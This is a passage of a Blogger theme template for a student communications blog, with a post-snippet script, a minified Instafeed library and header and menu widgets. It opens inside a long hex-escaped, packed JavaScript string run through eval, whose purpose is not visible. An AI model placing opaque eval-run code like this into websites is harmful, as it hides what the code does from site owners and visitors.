c\x5c\x4d\x5c\x5c\x4d\x5c\x5c\x4d\x5c\x5c\x4d\x5c\x5c\x4d\x5c\x5c\x4d\x5c\x5c\x56\x5c\x5c\x31\x6a\x5c\x5c\x78\x5c\x5c\x39\x5c\x5c\x65\x5c\x5c\x64\x5c\x5c\x53\x5c\x5c\x65\x5c\x5c\x39\x5c\x5c\x65\x5c\x5c\x75\x5c\x5c\x77\x5c\x5c\x70\x5c\x5c\x45\x5c\x5c\x39\x5c\x5c\x74\x5c\x5c\x69\x5c\x5c\x69\x5c\x5c\x64\x5c\x5c\x73\x5c\x5c\x31\x61\x5c\x5c\x31\x67\x5c\x5c\x59\x5c\x5c\x31\x66\x5c\x5c\x39\x5c\x5c\x41\x5c\x5c\x41\x5c\x5c\x41\x5c\x5c\x39\x5c\x5c\x6f\x5c\x5c\x77\x5c\x5c\x45\x5c\x5c\x6f\x5c\x5c\x65\x5c\x5c\x73\x5c\x5c\x39\x5c\x5c\x45\x5c\x5c\x76\x5c\x5c\x39\x5c\x5c\x45\x5c\x5c\x6a\x5c\x5c\x6d\x5c\x5c\x4e\x5c\x5c\x6f\x5c\x5c\x76\x5c\x5c\x6d\x5c\x5c\x65\x5c\x5c\x39\x5c\x5c\x69\x5c\x5c\x65\x5c\x5c\x75\x5c\x5c\x39\x5c\x5c\x74\x5c\x5c\x65\x5c\x5c\x64\x5c\x5c\x70\x5c\x5c\x39\x5c\x5c\x31\x65\x5c\x5c\x6b\x5c\x5c\x46\x5c\x5c\x6e\x5c\x5c\x65\x5c\x5c\x75\x5c\x5c\x64\x5c\x5c\x70\x5c\x5c\x64\x5c\x5c\x6f\x5c\x5c\x39\x5c\x5c\x6a\x5c\x5c\x6b\x5c\x5c\x45\x5c\x5c\x64\x5c\x5c\x6a\x5c\x5c\x31\x77\x5c\x5c\x65\x5c\x5c\x75\x5c\x5c\x77\x5c\x5c\x70\x5c\x5c\x45\x5c\x5c\x39\x5c\x5c\x6f\x5c\x5c\x75\x5c\x5c\x6d\x5c\x5c\x47\x5c\x5c\x76\x5c\x5c\x6d\x5c\x5c\x6f\x5c\x5c\x65\x5c\x5c\x6f\x5c\x5c\x77\x5c\x5c\x70\x5c\x5c\x70\x5c\x5c\x6b\x5c\x5c\x73\x5c\x5c\x46\x5c\x5c\x39\x5c\x5c\x6a\x5c\x5c\x6d\x5c\x5c\x78\x5c\x5c\x6b\x5c\x5c\x65\x5c\x5c\x74\x5c\x5c\x6d\x5c\x5c\x69\x5c\x5c\x39\x5c\x5c\x69\x5c\x5c\x77\x5c\x5c\x6a\x5c\x5c\x6a\x5c\x5c\x39\x5c\x5c\x31\x38\x5c\x5c\x73\x5c\x5c\x64\x5c\x5c\x64\x5c\x5c\x39\x5c\x5c\x5a\x5c\x5c\x6a\x5c\x5c\x6d\x5c\x5c\x4e\x5c\x5c\x4e\x5c\x5c\x64\x5c\x5c\x73\x5c\x5c\x39\x5c\x5c\x44\x5c\x5c\x74\x5c\x5c\x6f\x5c\x5c\x76\x5c\x5c\x6a\x5c\x5c\x6b\x5c\x5c\x46\x5c\x5c\x39\x5c\x5c\x73\x5c\x5c\x64\x5c\x5c\x78\x5c\x5c\x64\x5c\x5c\x69\x5c\x5c\x65\x5c\x5c\x39\x5c\x5c\x31\x67\x5c\x5c\x64\x5c\x5c\x70\x5c\x5c\x76\x5c\x5c\x6a\x5c\x5c\x6b\x5c\x5c\x65\x5c\x5c\x64\x5c\x5c\x6f\x5c\x5c\x39\x5c\x5c\x6f\x5c\x5c\x77\x5c\x5c\x70\x5c\x5c\x39\x5c\x5c\x6a\x5c\x5c\x6b\x5c\x5c\x6f\x5c\x5c\x65\x5c\x5c\x57\x5c\x5c\x69\x5c\x5c\x44\x5c\x5c\x64\x5c\x5c\x53\x5c\x5c\x31\x36\x5c\x5c\x41\x5c\x5c\x39\x5c\x5c\x70\x5c\x5c\x46\x5c\x5c\x78\x5c\x5c\x6d\x5c\x5c\x69\x5c\x5c\x65\x5c\x5c\x64\x5c\x5c\x69\x5c\x5c\x65\x5c\x5c\x39\x5c\x5c\x6f\x5c\x5c\x75\x5c\x5c\x6d\x5c\x5c\x47\x5c\x5c\x78\x5c\x5c\x6d\x5c\x5c\x70\x5c\x5c\x70\x5c\x5c\x64\x5c\x5c\x69\x5c\x5c\x65\x5c\x5c\x69\x5c\x5c\x77\x5c\x5c\x70\x5c\x5c\x39\x5c\x5c\x76\x5c\x5c\x6b\x5c\x5c\x73\x5c\x5c\x6f\x5c\x5c\x64\x5c\x5c\x57\x5c\x5c\x69\x5c\x5c\x65\x5c\x5c\x39\x5c\x5c\x44\x5c\x5c\x74\x5c\x5c\x6f\x5c\x5c\x76\x5c\x5c\x6a\x5c\x5c\x6b\x5c\x5c\x46\x5c\x5c\x6f\x5c\x5c\x64\x5c\x5c\x76\x5c\x5c\x6b\x5c\x5c\x73\x5c\x5c\x6b\x5c\x5c\x65\x5c\x5c\x6d\x5c\x5c\x73\x5c\x5c\x39\x5c\x5c\x78\x5c\x5c\x70\x5c\x5c\x70\x5c\x5c\x39\x5c\x5c\x59\x5c\x5c\x6d\x5c\x5c\x73\x5c\x5c\x64\x5c\x5c\x39\x5c\x5c\x6d\x5c\x5c\x69\x5c\x5c\x6a\x5c\x5c\x6d\x5c\x5c\x6b\x5c\x5c\x44\x5c\x5c\x39\x5c\x5c\x78\x5c\x5c\x6b\x5c\x5c\x6a\x5c\x5c\x64\x5c\x5c\x69\x5c\x5c\x44\x5c\x5c\x6b\x5c\x5c\x73\x5c\x5c\x39\x5c\x5c\x4e\x5c\x5c\x64\x5c\x5c\x65\x5c\x5c\x31\x34\x5c\x5c\x6a\x5c\x5c\x64\x5c\x5c\x70\x5c\x5c\x64\x5c\x5c\x69\x5c\x5c\x65\x5c\x5c\x5a\x5c\x5c\x46\x5c\x5c\x57\x5c\x5c\x44\x5c\x5c\x39\x5c\x5c\x70\x5c\x5c\x64\x5c\x5c\x65\x5c\x5c\x6b\x5c\x5c\x39\x5c\x5c\x44\x5c\x5c\x6b\x5c\x5c\x65\x5c\x5c\x64\x5c\x5c\x39\x5c\x5c\x6f\x5c\x5c\x75\x5c\x5c\x6d\x5c\x5c\x47\x5c\x5c\x76\x5c\x5c\x6d\x5c\x5c\x6f\x5c\x5c\x65\x5c\x5c\x44\x5c\x5c\x6b\x5c\x5c\x65\x5c\x5c\x64\x5c\x5c\x39\x5c\x5c\x74\x5c\x5c\x78\x5c\x5c\x6d\x5c\x5c\x69\x5c\x5c\x39\x5c\x5c\x44\x5c\x5c\x6d\x5c\x5c\x41\x5c\x5c\x6d\x5c\x5c\x6a\x5c\x5c\x6a\x5c\x5c\x6d\x5c\x5c\x47\x5c\x5c\x39\x5c\x5c\x45\x5c\x5c\x6a\x5c\x5c\x6d\x5c\x5c\x78\x5c\x5c\x52\x5c\x5c\x39\x5c\x5c\x76\x5c\x5c\x6d\x5c\x5c\x6f\x5c\x5c\x65\x5c\x5c\x39\x5c\x5c\x74\x5c\x5c\x69\x5c\x5c\x6a\x5c\x5c\x74\x5c\x5c\x69\x5c\x5c\x64\x5c\x5c\x39\x5c\x5c\x41\x5c\x5c\x6d\x5c\x5c\x69\x5c\x5c\x65\x5c\x5c\x39\x5c\x5c\x73\x5c\x5c\x64\x5c\x5c\x76\x5c\x5c\x64\x5c\x5c\x6b\x5c\x5c\x65\x5c\x5c\x39\x5c\x5c\x74\x5c\x5c\x69\x5c\x5c\x75\x5c\x5c\x64\x5c\x5c\x73\x5c\x5c\x74\x5c\x5c\x65\x5c\x5c\x39\x5c\x5c\x6f\x5c\x5c\x31\x6f\x5c\x5c\x6e\x5c\x5c\x39\x5c\x5c\x69\x5c\x5c\x6d\x5c\x5c\x39\x5c\x5c\x6d\x5c\x5c\x4c\x5c\x5c\x64\x5c\x5c\x73\x5c\x5c\x6a\x5c\x5c\x6b\x5c\x5c\x46\x5c\x5c\x39\x5c\x5c\x78\x5c\x5c\x6d\x5c\x5c\x4c\x5c\x5c\x64\x5c\x5c\x73\x5c\x5c\x39\x5c\x5c\x6a\x5c\x5c\x6b\x5c\x5c\x45\x5c\x5c\x64\x5c\x5c\x6a\x5c\x5c\x39\x5c\x5c\x78\x5c\x5c\x6d\x5c\x5c\x69\x5c\x5c\x39\x5c\x5c\x6f\x5c\x5c\x64\x5c\x5c\x6b\x5c\x5c\x73\x5c\x5c\x78\x5c\x5c\x75\x22\x2c\x22\x22\x2c\x22\x5c\x5c\x41\x5c\x5c\x73\x5c\x5c\x6d\x5c\x5c\x70\x5c\x5c\x56\x5c\x5c\x75\x5c\x5c\x6b\x5c\x5c\x73\x5c\x5c\x56\x5c\x5c\x6d\x5c\x5c\x44\x5c\x5c\x64\x22\x2c\x22\x5c\x5c\x31\x76\x5c\x5c\x45\x22\x2c\x22\x5c\x5c\x4e\x22\x2c\x22\x5c\x5c\x73\x5c\x5c\x64\x5c\x5c\x76\x5c\x5c\x6a\x5c\x5c\x6b\x5c\x5c\x78\x5c\x5c\x64\x22\x5d\x3b\x31\x4c\x28\x31\x45\x28\x31\x78\x2c\x31\x75\x2c\x58\x2c\x31\x44\x2c\x31\x79\x2c\x31\x52\x29\x7b\x31\x79\x3d\x31\x45\x28\x58\x29\x7b\x31\x46\x28\x58\x3c\x31\x75\x3f\x31\x30\x5b\x34\x5d\x3a\x31\x79\x28\x31\x59\x28\x58\x2f\x31\x75\x29\x29\x29\x2b\x28\x28\x58\x3d\x58\x25\x31\x75\x29\x3e\x31\x58\x3f\x31\x57\x5b\x31\x30\x5b\x35\x5d\x5d\x28\x58\x2b\x31\x56\x29\x3a\x58\x2e\x31\x55\x28\x31\x4d\x29\x29\x7d\x3b\x31\x53\x28\x58\x2d\x2d\x29\x7b\x31\x54\x28\x31\x44\x5b\x58\x5d\x29\x7b\x31\x78\x3d\x31\x78\x5b\x31\x30\x5b\x38\x5d\x5d\x28\x31\x51\x20\x31\x50\x28\x31\x30\x5b\x36\x5d\x2b\x31\x79\x28\x58\x29\x2b\x31\x30\x5b\x36\x5d\x2c\x31\x30\x5b\x37\x5d\x29\x2c\x31\x44\x5b\x58\x5d\x29\x7d\x7d\x3b\x31\x46\x20\x31\x78\x7d\x28\x31\x30\x5b\x30\x5d\x2c\x31\x4f\x2c\x31\x4e\x2c\x31\x30\x5b\x33\x5d\x5b\x31\x30\x5b\x32\x5d\x5d\x28\x31\x30\x5b\x31\x5d\x29\x29\x29\x27\x2c\x36\x32\x2c\x31\x32\x33\x2c\x27\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x78\x37\x43\x7c\x78\x32\x32\x7c\x78\x33\x44\x7c\x78\x33\x31\x7c\x78\x36\x35\x7c\x78\x37\x34\x7c\x78\x32\x30\x7c\x78\x32\x37\x7c\x78\x32\x45\x7c\x78\x36\x45\x7c\x78\x36\x43\x7c\x78\x36\x31\x7c\x78\x33\x42\x7c\x78\x36\x46\x7c\x78\x33\x32\x7c\x78\x37\x33\x7c\x78\x36\x44\x7c\x78\x32\x38\x7c\x78\x32\x39\x7c\x78\x37\x32\x7c\x78\x36\x39\x7c\x78\x36\x38\x7c\x78\x37\x30\x7c\x78\x37\x35\x7c\x78\x36\x33\x7c\x78\x32\x46\x7c\x78\x33\x43\x7c\x78\x36\x36\x7c\x78\x33\x45\x7c\x78\x32\x42\x7c\x78\x36\x34\x7c\x78\x36\x32\x7c\x78\x37\x39\x7c\x78\x37\x37\x7c\x78\x32\x44\x7c\x78\x36\x41\x7c\x78\x35\x42\x7c\x78\x35\x44\x7c\x78\x37\x36\x7c\x78\x34\x31\x7c\x78\x36\x37\x7c\x78\x37\x42\x7c\x78\x37\x44\x7c\x78\x37\x31\x7c\x78\x36\x42\x7c\x78\x37\x38\x7c\x78\x33\x30\x7c\x78\x32\x43\x7c\x78\x34\x33\x7c\x78\x34\x39\x7c\x5f\x30\x78\x36\x65\x63\x35\x78\x33\x7c\x78\x34\x44\x7c\x78\x34\x32\x7c\x5f\x30\x78\x34\x61\x32\x34\x7c\x78\x32\x31\x7c\x78\x33\x41\x7c\x78\x33\x35\x7c\x78\x34\x35\x7c\x78\x34\x41\x7c\x78\x34\x46\x7c\x78\x34\x34\x7c\x78\x34\x36\x7c\x78\x37\x41\x7c\x78\x34\x38\x7c\x78\x32\x36\x7c\x78\x34\x42\x7c\x78\x34\x45\x7c\x78\x35\x37\x7c\x78\x34\x43\x7c\x78\x35\x34\x7c\x78\x34\x37\x7c\x78\x33\x36\x7c\x78\x33\x34\x7c\x78\x33\x33\x7c\x78\x35\x36\x7c\x78\x35\x31\x7c\x78\x32\x34\x7c\x78\x33\x37\x7c\x78\x35\x30\x7c\x78\x33\x38\x7c\x78\x35\x35\x7c\x78\x35\x33\x7c\x78\x35\x32\x7c\x5f\x30\x78\x36\x65\x63\x35\x78\x32\x7c\x78\x35\x43\x7c\x78\x35\x46\x7c\x5f\x30\x78\x36\x65\x63\x35\x78\x31\x7c\x5f\x30\x78\x36\x65\x63\x35\x78\x35\x7c\x78\x35\x39\x7c\x78\x35\x38\x7c\x78\x33\x39\x7c\x78\x35\x41\x7c\x5f\x30\x78\x36\x65\x63\x35\x78\x34\x7c\x66\x75\x6e\x63\x74\x69\x6f\x6e\x7c\x72\x65\x74\x75\x72\x6e\x7c\x78\x35\x45\x7c\x78\x32\x41\x7c\x78\x32\x33\x7c\x78\x33\x46\x7c\x76\x61\x72\x7c\x65\x76\x61\x6c\x7c\x33\x36\x7c\x31\x38\x33\x7c\x36\x32\x7c\x52\x65\x67\x45\x78\x70\x7c\x6e\x65\x77\x7c\x5f\x30\x78\x36\x65\x63\x35\x78\x36\x7c\x77\x68\x69\x6c\x65\x7c\x69\x66\x7c\x74\x6f\x53\x74\x72\x69\x6e\x67\x7c\x32\x39\x7c\x53\x74\x72\x69\x6e\x67\x7c\x33\x35\x7c\x70\x61\x72\x73\x65\x49\x6e\x74\x27\x2e\x73\x70\x6c\x69\x74\x28\x27\x7c\x27\x29\x2c\x30\x2c\x7b\x7d\x29\x29\x0a";eval(_U1cfeL);
2218//]]>
2219</script>
2220
2221<script type='text/javascript'>
2222snippet_count = 450;
2223
2224//<![CDATA[
2225function removeHtmlTag(strx,chop){
2226if(strx.indexOf("<")!=-1)
2227{
2228var s = strx.split("<");
2229for(var i=0;i<s.length;i++){
2230if(s[i].indexOf(">")!=-1){
2231s[i] = s[i].substring(s[i].indexOf(">")+1,s[i].length);
2232}
2233}
2234strx = s.join("");
2235}
2236chop = (chop < strx.length-1) ? chop : strx.length-2;
2237while(strx.charAt(chop-1)!=' ' && strx.indexOf(' ',chop)!=-1) chop++;
2238strx = strx.substring(0,chop-1);
2239return strx+'...';
2240}
2241function createSnippet(pID){
2242var div = document.getElementById(pID);
2243var summ = snippet_count;
2244var summary = '<div class="snippets">' + removeHtmlTag(div.innerHTML,summ) + '</div>';
2245div.innerHTML = summary;
2246}
2247
2248//]]>
2249</script>
2250<script>
2251//<![CDATA[
2252// Generated by CoffeeScript 1.3.3
2253(function(){var e,t;e=function(){function e(e,t){var n,r;this.options={target:"instafeed",get:"popular",resolution:"thumbnail",sortBy:"none",links:!0,mock:!1,useHttp:!1};if(typeof e=="object")for(n in e)r=e[n],this.options[n]=r;this.context=t!=null?t:this,this.unique=this._genKey()}return e.prototype.hasNext=function(){return typeof this.context.nextUrl=="string"&&this.context.nextUrl.length>0},e.prototype.next=function(){return this.hasNext()?this.run(this.context.nextUrl):!1},e.prototype.run=function(t){var n,r,i;if(typeof this.options.clientId!="string"&&typeof this.options.accessToken!="string")throw new Error("Missing clientId or accessToken.");if(typeof this.options.accessToken!="string"&&typeof this.options.clientId!="string")throw new Error("Missing clientId or accessToken.");return this.options.before!=null&&typeof this.options.before=="function"&&this.options.before.call(this),typeof document!="undefined"&&document!==null&&(i=document.createElement("script"),i.id="instafeed-fetcher",i.src=t||this._buildUrl(),n=document.getElementsByTagName("head"),n[0].appendChild(i),r="instafeedCache"+this.unique,window[r]=new e(this.options,this),window[r].unique=this.unique),!0},e.prototype.parse=function(e){var t,n,r,i,s,o,u,a,f,l,c,h,p,d,v,m,g,y,b,w,E,S;if(typeof e!="object"){if(this.options.error!=null&&typeof this.options.error=="function")return this.options.error.call(this,"Invalid JSON data"),!1;throw new Error("Invalid JSON response")}if(e.meta.code!==200){if(this.options.error!=null&&typeof this.options.error=="function")return this.options.error.call(this,e.meta.error_message),!1;throw new Error("Error from Instagram: "+e.meta.error_message)}if(e.data.length===0){if(this.options.error!=null&&typeof this.options.error=="function")return this.options.error.call(this,"No images were returned from Instagram"),!1;throw new Error("No images were returned from Instagram")}this.options.success!=null&&typeof this.options.success=="function"&&this.options.success.call(this,e),this.context.nextUrl="",e.pagination!=null&&(this.context.nextUrl=e.pagination.next_url);if(this.options.sortBy!=="none"){this.options.sortBy==="random"?d=["","random"]:d=this.options.sortBy.split("-"),p=d[0]==="least"?!0:!1;switch(d[1]){case"random":e.data.sort(function(){return.5-Math.random()});break;case"recent":e.data=this._sortBy(e.data,"created_time",p);break;case"liked":e.data=this._sortBy(e.data,"likes.count",p);break;case"commented":e.data=this._sortBy(e.data,"comments.count",p);break;default:throw new Error("Invalid option for sortBy: '"+this.options.sortBy+"'.")}}if(typeof document!="undefined"&&document!==null&&this.options.mock===!1){a=e.data,this.options.limit!=null&&a.length>this.options.limit&&(a=a.slice(0,this.options.limit+1||9e9)),n=document.createDocumentFragment(),this.options.filter!=null&&typeof this.options.filter=="function"&&(a=this._filter(a,this.options.filter));if(this.options.template!=null&&typeof this.options.template=="string"){i="",o="",l="",v=document.createElement("div");for(m=0,b=a.length;m<b;m++)s=a[m],u=s.images[this.options.resolution].url,this.options.useHttp||(u=u.replace("http://","//")),o=this._makeTemplate(this.options.template,{model:s,id:s.id,link:s.link,image:u,caption:this._getObjectProperty(s,"caption.text"),likes:s.likes.count,comments:s.comments.count,location:this._getObjectProperty(s,"location.name")}),i+=o;v.innerHTML=i,S=[].slice.call(v.childNodes);for(g=0,w=S.length;g<w;g++)h=S[g],n.appendChild(h)}else for(y=0,E=a.length;y<E;y++)s=a[y],f=document.createElement("img"),u=s.images[this.options.resolution].url,this.options.useHttp||(u=u.replace("http://","//")),f.src=u,this.options.links===!0?(t=document.createElement("a"),t.href=s.link,t.appendChild(f),n.appendChild(t)):n.appendChild(f);document.getElementById(this.options.target).appendChild(n),r=document.getElementsByTagName("head")[0],r.removeChild(document.getElementById("instafeed-fetcher")),c="instafeedCache"+this.unique,window[c]=void 0;try{delete window[c]}catch(x){}}return this.options.after!=null&&typeof this.options.after=="function"&&this.options.after.call(this),!0},e.prototype._buildUrl=function(){var e,t,n;e="https://api.instagram.com/v1";switch(this.options.get){case"popular":t="media/popular";break;case"tagged":if(typeof this.options.tagName!="string")throw new Error("No tag name specified. Use the 'tagName' option.");t="tags/"+this.options.tagName+"/media/recent";break;case"location":if(typeof this.options.locationId!="number")throw new Error("No location specified. Use the 'locationId' option.");t="locations/"+this.options.locationId+"/media/recent";break;case"user":if(typeof this.options.userId!="number")throw new Error("No user specified. Use the 'userId' option.");if(typeof this.options.accessToken!="string")throw new Error("No access token. Use the 'accessToken' option.");t="users/"+this.options.userId+"/media/recent";break;default:throw new Error("Invalid option for get: '"+this.options.get+"'.")}return n=""+e+"/"+t,this.options.accessToken!=null?n+="?access_token="+this.options.accessToken:n+="?client_id="+this.options.clientId,this.options.limit!=null&&(n+="&count="+this.options.limit),n+="&callback=instafeedCache"+this.unique+".parse",n},e.prototype._genKey=function(){var e;return e=function(){return((1+Math.random())*65536|0).toString(16).substring(1)},""+e()+e()+e()+e()},e.prototype._makeTemplate=function(e,t){var n,r,i,s,o;r=/(?:\{{2})([\w\[\]\.]+)(?:\}{2})/,n=e;while(r.test(n))i=n.match(r)[1],s=(o=this._getObjectProperty(t,i))!=null?o:"",n=n.replace(r,""+s);return n},e.prototype._getObjectProperty=function(e,t){var n,r;t=t.replace(/\[(\w+)\]/g,".$1"),r=t.split(".");while(r.length){n=r.shift();if(!(e!=null&&n in e))return null;e=e[n]}return e},e.prototype._sortBy=function(e,t,n){var r;return r=function(e,r){var i,s;return i=this._getObjectProperty(e,t),s=this._getObjectProperty(r,t),n?i>s?1:-1:i<s?1:-1},e.sort(r.bind(this)),e},e.prototype._filter=function(e,t){var n,r,i,s,o;n=[],i=function(e){if(t(e))return n.push(e)};for(s=0,o=e.length;s<o;s++)r=e[s],i(r);return n},e}(),t=typeof exports!="undefined"&&exports!==null?exports:window,t.Instafeed=e}).call(this);
2254
2255
2256 //]]></script>
2257<b:include data='blog' name='google-analytics'/>
2258</head>
2259<body expr:class='data:blog.pageType'>
2260<div id="outer-wrapper" class="<data:blog.pageType/><b:if cond='data:blog.url == data:blog.homepageUrl'> home</b:if><b:if cond='data:blog.pageType == "static_page"'> item</b:if><b:if cond='data:blog.pageType == "archive"'> index</b:if>">
2261<div class='top-bar'>
2262
2263 <div class='top-bar-wrapper row'>
2264
2265 <b:section class='top-bar-social blue' id='header social widget' maxwidgets='1' name='Top Social Widget' showaddelement='no'>
2266<b:widget id='LinkList230' locked='true' title='Social Media Icons' type='LinkList' version='1'>
2267 <b:widget-settings>
2268 <b:widget-setting name='sorting'>NONE</b:widget-setting>
2269 <b:widget-setting name='text-1'>twitter</b:widget-setting>
2270 <b:widget-setting name='link-1'>#</b:widget-setting>
2271 <b:widget-setting name='text-0'>facebook</b:widget-setting>
2272 <b:widget-setting name='link-2'>#</b:widget-setting>
2273 <b:widget-setting name='link-0'>#</b:widget-setting>
2274 <b:widget-setting name='text-2'>gplus</b:widget-setting>
2275 </b:widget-settings>
2276 <b:includable id='main'>
2277 <div class='widget-content'>
2278 <ul id='social'>
2279 <b:loop values='data:links' var='link'>
2280 <li><a expr:class='data:link.name' expr:href='data:link.target' expr:title='data:link.name'/></li>
2281 </b:loop>
2282 </ul>
2283 </div>
2284<div id='search-bar'>
2285<span class='header-search'>
2286<i class='fa fa-search'/>
2287<i class='fa fa-times'/>
2288</span>
2289<div class='search-form' style='display: none;'>
2290<form action='/search' id='searchform' method='get'>
2291<input name='q' placeholder='Search' type='text' vk_18d09='subscribed' vk_1ad21='subscribed' vk_1b6ba='subscribed'/>
2292</form>
2293</div></div>
2294 </b:includable>
2295</b:widget>
2296</b:section>
2297 <div class='top-bar-menu'>
2298
2299
2300<div class='top-menu'>
2301 <b:section class='top-menu' id='top-menu' maxwidgets='1' showaddelement='yes'>
2302 <b:widget id='LinkList940' locked='true' title='Main Menu' type='LinkList' version='1'>
2303 <b:widget-settings>
2304 <b:widget-setting name='sorting'>NONE</b:widget-setting>
2305 <b:widget-setting name='text-1'><![CDATA[<i class="fa fa-envelope"></i> Contact</a>]]></b:widget-setting>
2306 <b:widget-setting name='link-1'>http://trendy-travels-way2themes.blogspot.com/p/contact-us_22.html</b:widget-setting>
2307 <b:widget-setting name='text-0'><![CDATA[<i class="fa fa-home"></i> Home]]></b:widget-setting>
2308 <b:widget-setting name='link-2'>http://trendy-travels-way2themes.blogspot.com/p/about-way2themes_22.html</b:widget-setting>
2309 <b:widget-setting name='link-0'>/</b:widget-setting>
2310 <b:widget-setting name='text-2'><![CDATA[<i class="fa fa-user"></i> About]]></b:widget-setting>
2311 </b:widget-settings>
2312 <b:includable id='main'>
2313 <div class='widget-content'>
2314 <ul id='nav1' itemscope='' itemtype='http://schema.org/SiteNavigationElement'>
2315 <b:loop values='data:links' var='link'>
2316 <li itemprop='name'><a expr:href='data:link.target' itemprop='url'><data:link.name/></a></li>
2317 </b:loop>
2318 </ul>
2319
2320
2321 </div>
2322 </b:includable>
2323 </b:widget>
2324 </b:section>
2325</div></div>
2326 </div>
2327
2328 </div>
2329<div style='clear: both;'/>
2330 <div class='header-wrapper' id='header-wp' itemscope='' itemtype='http://schema.org/WPHeader'>
2331 <b:section class='header' id='Logo' maxwidgets='1' showaddelement='no'>
2332 <b:widget id='Header1' locked='true' title='JURNALISTIK (Header)' type='Header' version='1'>
2333 <b:widget-settings>
2334 <b:widget-setting name='displayUrl'>https://3.bp.blogspot.com/-51VMcrwePZ0/WwTvVozO4vI/AAAAAAAAAoA/B4VVXT5tVv8XqmNS5GJNnLQaLQaa1_OMQCPcBGAYYCw/s1600/Banner.png</b:widget-setting>
2335 <b:widget-setting name='displayHeight'>300</b:widget-setting>
2336 <b:widget-setting name='sectionWidth'>2320</b:widget-setting>
2337 <b:widget-setting name='useImage'>true</b:widget-setting>
2338 <b:widget-setting name='shrinkToFit'>true</b:widget-setting>
2339 <b:widget-setting name='imagePlacement'>BEFORE_DESCRIPTION</b:widget-setting>
2340 <b:widget-setting name='displayWidth'>400</b:widget-setting>
2341 </b:widget-settings>
2342 <b:includable id='main'>
2343 <b:if cond='data:useImage'>
2344 <b:if cond='data:imagePlacement == "BEHIND"'>
2345 <!--
2346 Show image as background to text. You can't really calculate the width
2347 reliably in JS because margins are not taken into account by any of
2348 clientWidth, offsetWidth or scrollWidth, so we don't force a minimum
2349 width if the user is using shrink to fit.
2350 This results in a margin-width's worth of pixels being cropped. If the
2351 user is not using shrink to fit then we expand the header.
2352 -->
2353 <b:if cond='data:mobile'>
2354 <div id='header-inner'>
2355 <div class='titlewrapper' style='background: transparent'>
2356 <h1 class='title' itemprop='name' style='background: transparent; border-width: 0px'>
2357 <b:include name='title'/>
2358 </h1>
2359 </div>
2360 <b:include name='description'/>
2361 </div>
2362 <b:else/>
2363 <div expr:style='"background-image: url(\"" + data:sourceUrl + "\"); " + "background-position: " + data:backgroundPositionStyleStr + "; " + data:widthStyleStr + "min-height: " + data:height + "_height: " + data:height + "background-repeat: no-repeat; "' id='header-inner'>
2364 <div class='titlewrapper' style='background: transparent'>
2365 <h1 class='title' style='background: transparent; border-width: 0px'>
2366 <b:include name='title'/>
2367 </h1>
2368 </div>
2369 <b:include name='description'/>
2370 </div>
2371 </b:if>
2372 <b:else/>
2373 <!--Show the image only-->
2374 <div id='header-inner'>
2375 <a expr:href='data:blog.homepageUrl' itemprop='url' style='display: block'><h1 style='display:none;'/>
2376 <img expr:alt='data:title' expr:height='data:height' expr:id='data:widget.instanceId + "_headerimg"' expr:src='data:sourceUrl' expr:width='data:width' style='display: block'/>
2377 </a>
2378 <!--Show the description-->
2379 <b:if cond='data:imagePlacement == "BEFORE_DESCRIPTION"'>
2380 <b:include name='description'/>
2381 </b:if>
2382 </div>
2383 </b:if>
2384 <b:else/>
2385 <!--No header image -->
2386 <div id='header-inner'>
2387 <div class='titlewrapper'>
2388 <h1 class='title' itemprop='name'>
2389 <b:include name='title'/>
2390 </h1>
2391 </div>
2392 <b:include name='description'/>
2393 </div>
2394 </b:if>
2395</b:includable>
2396 <b:includable id='description'>
2397 <div class='descriptionwrapper'>
2398 <h3 class='description'><span><data:description/></span></h3>
2399 </div>
2400</b:includable>
2401 <b:includable id='title'>
2402 <b:tag cond='data:blog.url != data:blog.homepageUrl' expr:href='data:blog.homepageUrl' name='a'>
2403 <data:title/>
2404 </b:tag>
2405</b:includable>
2406 </b:widget>
2407 </b:section>
2408</div>
2409<div style='clear: both;'/>
2410<div class='navi-menu'>
2411<b:section class='nav-menu row' id='menu' maxwidgets='2' name='Navigation Menu' showaddelement='no'>
2412 <b:widget id='LinkList100' locked='true' title='' type='LinkList' version='1'>
2413 <b:widget-settings>
2414 <b:widget-setting name='text-9'><![CDATA[<i class="fa fa-book"></i> Universitas Singaperbangsa Karawang]]></b:widget-setting>
2415 <b:widget-setting name='link-9'>http://bascomm17.blogspot.co.id/p/universitas-singaperbangsa-karawang.html</b:widget-setting>
2416 <b:widget-setting name='text-8'>_Error Page</b:widget-setting>
2417 <b:widget-setting name='link-7'>http://bascomm17.blogspot.co.id/p/blog-page.html</b:widget-setting>
2418 <b:widget-setting name='link-8'>http://bascomm17.blogspot.co.id/p/erri.html</b:widget-setting>
2419 <b:widget-setting name='text-10'><![CDATA[<i class="fa fa-briefcase"></i> About Bascomm17]]></b:widget-setting>
2420 <b:widget-setting name='link-5'>https://bascomm17.blogspot.co.id/search/label/Featured</b:widget-setting>
2421 <b:widget-setting name='link-6'>https://www.youtube.com/watch?v=jnnzbdt4_RE</b:widget-setting>
2422 <b:widget-setting name='link-3'>https://bascomm17.blogspot.co.id/2018/05/communication-youth-expo-millennials.html</b:widget-setting>
2423 <b:widget-setting name='link-4'>https://bascomm17.blogspot.co.id/2018/05/butuh-tempat-refreshing-sekaligus_7.html</b:widget-setting>
2424 <b:widget-setting name='text-1'><![CDATA[<i class="fa fa-cog"></i> Features]]></b:widget-setting>
2425 <b:widget-setting name='text-0'><![CDATA[<i class="fa fa-home"></i> Home]]></b:widget-setting>
2426 <b:widget-setting name='text-3'>__Best Post</b:widget-setting>
2427 <b:widget-setting name='text-2'>_Recommended</b:widget-setting>
2428 <b:widget-setting name='text-5'>__Recommended Post</b:widget-setting>
2429 <b:widget-setting name='text-4'>__Better Than Ever!</b:widget-setting>
2430 <b:widget-setting name='text-7'>_All Post</b:widget-setting>
2431 <b:widget-setting name='text-6'>_Put Some Music?</b:widget-setting>
2432 <b:widget-setting name='sorting'>NONE</b:widget-setting>
2433 <b:widget-setting name='link-1'>#</b:widget-setting>
2434 <b:widget-setting name='link-2'>#</b:widget-setting>
2435 <b:widget-setting name='link-0'>/</b:widget-setting>
2436 <b:widget-setting name='link-10'>https://www.instagram.com/bascomm17</b:widget-setting>
2437 </b:widget-settings>
2438 <b:includable id='main'>
2439
2440 <div class='widget-content'>
2441 <ul itemscope='' itemtype='http://schema.org/SiteNavigationElement'>
2442 <b:loop values='data:links' var='link'>
2443 <li itemprop='name'><a expr:href='data:link.target' itemprop='url'><data:link.name/></a></li>
2444 </b:loop>
2445
2446 </ul>
2447
2448</div>
2449</b:includable>
2450 </b:widget>
